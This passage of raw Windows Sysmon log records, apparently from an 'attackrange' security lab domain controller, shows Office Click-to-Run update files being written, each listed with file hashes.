Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\mecontrol.pngMD5=68F795FD371004E3C79D83C04583B93A,SHA256=589A1F69A151D6C434B2F1512708DB333ADFB50B09BC7ADB8A3E82BBD6E461B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\manifest.xmlMD5=691F0C344E43039028E9CFA6191CE16E,SHA256=9252CE0ADE57B64C55BBD5CD7CE88DC1C37BE478873AEDB23ABC1C29724E0F92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\main.stats.jsonMD5=4D47BCF0512A95F1561E2614521B87DB,SHA256=BF7C146C1256D0FF2BE86FDE5E32766126210CBF9E677D4FCAA4F501A0D44B28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.720{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=301576802273487BAEC77582D50BB809,SHA256=6771FEACD5A6E5D692FA3409F3A84EBD48404C295AE48A01A506BD891904D8A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\catalog.jsonMD5=A42518AFF34FC203929A5EE4762ED27A,SHA256=1D261DC4CE4FD1D1E325032CDF59B00E1ED1E16E259214E6E389612117198DE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\assets\assets\images\MSFT.pngMD5=5FE8FD609BC9EFD7DECBF88656366937,SHA256=E7ACA25F45E0DD7EE6E35E7C2F67347FF79B002266948538CAC635C0F59C2177,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\assets\assets\images\add_user_72.pngMD5=AB5048490948648B5E2AFE9B2A1C792A,SHA256=91DDE7308F3457FB37C89BCD77C1B8B1033ADD61C06F48A508CBC23CC8FA6968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000027\manifest.xmlMD5=7F683C31D94AFEFD28241AD36B115B0C,SHA256=55B2F6DCE8386A58C69A7F6F4318BB58A5E5D4E288AF44E0253DA67A2E4490FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000027\comments.win32.tpnMD5=12CF0EBC9E415FB96560C734E2717045,SHA256=9B099EBF8D0786D5CE56F1704EC94CF5DC135B27CF8D3BBE7C1FCE1038E68B33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000027\comments.win32.bundleMD5=0B3C6E176CA26744B1F6B023382186D7,SHA256=27A95019101E8D7FFFF6F6E901D6A972D2CE709DF42A25355570A4D068072995,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\strings.resjsonMD5=434C2C493E257ECEDCCB7D5C400238D2,SHA256=A8C2F27EF1A8E29B1C232811D39B1436E602FEF3485E4E3AB578F87F1E515F9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\manifest.xmlMD5=18C714A3FC0F30A7D27C05FEF8588678,SHA256=BD582CF538CC95B33AF14E76C682E339A7CD0D0A68989A3E10B02693C94742C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\main.stats.jsonMD5=A38C761734BE95C05FD29E8FBD593AAB,SHA256=B44B78491DC0F58CDEA821B1E3A1D6856A240B93AE7CE302369C3220063729A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\catalog.jsonMD5=4CF6C00C9EE2E099E6EC95F08F74C9BA,SHA256=D81274438EF8D532A2331BD68AF4412099197EABE2FF0A29E85F538ACE55C9EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\CardViewIcon.pngMD5=5FDC02DEA317B399D2EBBA270D815D42,SHA256=7CDAC1206C933B521CBE3A41E9F2425A8BCA4FDD59C98E2A5E5F48D410A7D925,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview.win32.bundle.tpn.txtMD5=762551607BD4C5005085E909E6A32ED6,SHA256=E732E7D19A9FD9A8F6C424B09EBE5D232CCE24B4A7A563AD142EB7D60A63B6B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview.win32.bundle.mapMD5=A6022724B64168A46DF547CA0C690F3A,SHA256=BEFA4D52C696AA5D660A988B56DAE7E6ECFDD8221548821F3C4CE28D6386344E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview.win32.bundle.LICENSE.txtMD5=2AF46AA8DDFF65B0180B5F8B778BE7F7,SHA256=B8C1D6D488813E1875307BD002A5772C4C4FAF8F3C0BEB575C594C76B13AE856,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview.win32.bundleMD5=8966222FBB2D03F2FDFC9BCF42FDBDBC,SHA256=93A80A2C8B888884A1D9DB98A65730ACD363351013E99BBC33934F3505E2D2CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning@4x.pngMD5=602B7212331164E6E557A95C77115FE8,SHA256=BB4480C3E4697AA2ED66748010F97E9709F6B5E947AB9F0FECB0669107A698E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning@3x.pngMD5=9A9025F8A854155687FD7A7B5E32F3FE,SHA256=3D198834422582E8EFAAFC99151E3FFE2DEC2CB7DDCF9B803B6F688F1E6E8576,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning@2x.pngMD5=E9C12878120C827268A9D569A6BD403A,SHA256=3B2E56D7D50CC9AEF9324E17E888C5B504519EC603705A7BEFC439B23AB83D92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning.pngMD5=CADD7F8E8E8136E9BDC53DD103BF5CD9,SHA256=5C81A4D6BCC1B5CEAD78340BCB786DBBD0DC69BA9BCB2B0A7E53C6B2DEC11D05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages@4x.pngMD5=70489FCD5FA727806DF6F9FD6FE5D53C,SHA256=F7D2AE8262ACEBEE238CB1C0886B5859945CA7D59F458112383F73B5E2AACA8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages@3x.pngMD5=FDADF465C967675D0AF5C97D6BFE0BC1,SHA256=62651E0F731BB9C190BDAEE102C7C79CD7EDBCFAFD63EED3C39D5A161BE6B0BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages@2x.pngMD5=E69B9CD5EDFF40F6783F232C370D6483,SHA256=989234A844BE6509B4CE803DCC45B7BCFF7B8781279F0611C649086B05A4B617,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages.pngMD5=CF98998EA5C3B55DA4978C6F528CC6E2,SHA256=53F2B4D59D480E55AB03179481324C960F3923234F72021BD383964D262560E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity@4x.pngMD5=E7630219ED4F414DA14DDBCD965EB44C,SHA256=32E5EB9D49C6EF16ABFF4E0E294CC345AAEC8A74CE5129DC2A437421ABC7A560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity@3x.pngMD5=E67DE0D4E1CA00FD81E4B9B399E1DEC6,SHA256=429C4D4BBD5BB5E127F5580A531783C85C6ADB7B4A80F0A5269A2A3B6A447579,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity@2x.pngMD5=C98CCF6342D631F2E6BD90F875D2D60F,SHA256=222522B0C995A625DDEDD6CCAAFD9932175B05C946E9006F4C7F78622F1217E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity.pngMD5=47CB9A15584C3022EF9200EC88DB503D,SHA256=080FEDDF0204EE511B80C8AABD931169F252E4E464C39CFB8C1F33342E810568,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark@4x.pngMD5=F7B2F39E2BCE73D1F6CD3588F6967F4B,SHA256=87A2F985305D5963BDF18D258A7B2C5699F1D636F0258B4C54AD258574C92850,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark@3x.pngMD5=E84BA52D2BDED344230B6D190372E45D,SHA256=6E8065E05F5628CBCAAE5679D1169D3AB1192CC2D74AB60EAF86399B19AE8B96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark@2x.pngMD5=A2C27D98142673492FB3AB77F094F0A3,SHA256=B1EB7134F9C5BD6707DCFE775940E300192F4EB7495189E59EB9F4F492E1190E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark.pngMD5=ED3494CF8EC469636118AD827ECEE6A7,SHA256=0630C71D309F549234168B1A4B7F499A4B9850BF9FDBC35F2D5897F852292F2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag@4x.pngMD5=86B2E97CBA13D6D0F910D031DA2DAF9B,SHA256=9650E8205E57A4FC31E412BF463C37EA30250709B9CF2F9F97014FECF39EAE76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag@3x.pngMD5=53150A6C7673BBBFD9FBF844EC87C579,SHA256=37E12F983AA8C5AEB99B6DBCB39025A822A9B86A539D5ABE412800DE91E247C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag@2x.pngMD5=2AFA44D4DBB6C62A2511B33747053CD7,SHA256=E179C63D99892A39D1E162EB1F10E3CE40C397AA5103E9078A47D670689DC469,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag.pngMD5=D45B5CF08AEEA18A6D7205D470C48F51,SHA256=D6DD6E7DC6584F35993CF8D51AF5A569F947109102AFD52F05F8E99EF22789ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag-dark@4x.pngMD5=50B7EE65A737BCA0C14859C5E585CC6F,SHA256=FA1DF1307459DD7EB3B30084D1844C9F2E3CF1788AC209FD407AC20973AD6A86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag-dark@3x.pngMD5=298D4623458A2A114080B6CFB12F78EC,SHA256=0D6A41656F0DDE7F54E818742952351F8A62D0264D31CC258A0EFD67876DAAA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag-dark@2x.pngMD5=D19E27936E11E2C0D36D85ADD50C8E01,SHA256=EDA8C29A93550D166F955C5053EE100328194795062221B913A6E120EEC1464E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag-dark.pngMD5=C6D029AF7F89FDB803D9DAFF70A2A1F9,SHA256=472D20C7232526D267102DD1E2F03B9494FE918A3D548C596F4D21191A754495,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 